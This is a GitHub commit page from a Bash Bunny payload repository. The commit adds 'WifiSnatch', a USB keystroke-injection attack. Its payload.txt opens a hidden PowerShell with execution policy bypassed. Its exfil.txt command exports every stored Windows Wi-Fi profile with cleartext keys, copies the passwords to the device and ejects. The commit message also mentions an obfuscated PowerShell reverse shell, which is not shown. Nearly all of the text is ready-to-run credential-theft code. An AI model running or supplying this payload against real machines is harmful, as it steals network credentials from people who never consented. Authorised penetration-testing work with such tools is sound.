hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

WifiSnatch (#468)

Browse Source 
* Uploaded ReverseBunny

Obfuscated reverse shell via powershell

* Uploaded WifiSnatch

Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
This commit is contained in:
0iphor13
2021-09-24 19:41:15 +02:00
committed by GitHub
parent 80c724ad99
commit e79e39f95d
2 changed files with 56 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
payloads/library/exfiltration/WifiSnatch/exfil.txt Normal file
View File

@@ -0,0 +1 @@
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;Start-Sleep 1;cd $env:TEMP;Start-Sleep 1;netsh wlan export profile key=clear;Start-Sleep 3;Select-String -Path WLAN*.xml -Pattern 'keyMaterial' > WLAN-PWD;Start-Sleep 3;mv WLAN-PWD ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');Start-Sleep 15;New-Item -ItemType file $bb"DONE";(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");

55
payloads/library/exfiltration/WifiSnatch/payload.txt Normal file
View File

@@ -0,0 +1,55 @@
#!/bin/bash
#
# Title: WifiSnatch
# Description: Extract wifi information, such as passphrases & SSIDs
# Author: 0iphor13
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID, Storage
LED SETUP
GET SWITCH_POSITION
DUCKY_LANG de
rm /root/udisk/DONE
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
DELAY 5000
RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
DELAY 5000
Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))"
DELAY 10000
Q ENTER
DELAY 10000
Q CONTROL v
DELAY 10000
Q ENTER
DELAY 1000
LED STAGE2
until [ -f /root/udisk/DONE ]
do
sleep 0.2
done
LED CLEANUP
rm /root/udisk/DONE
DELAY 100
sync
DELAY 100
LED FINISH
#SAVE TO EJECT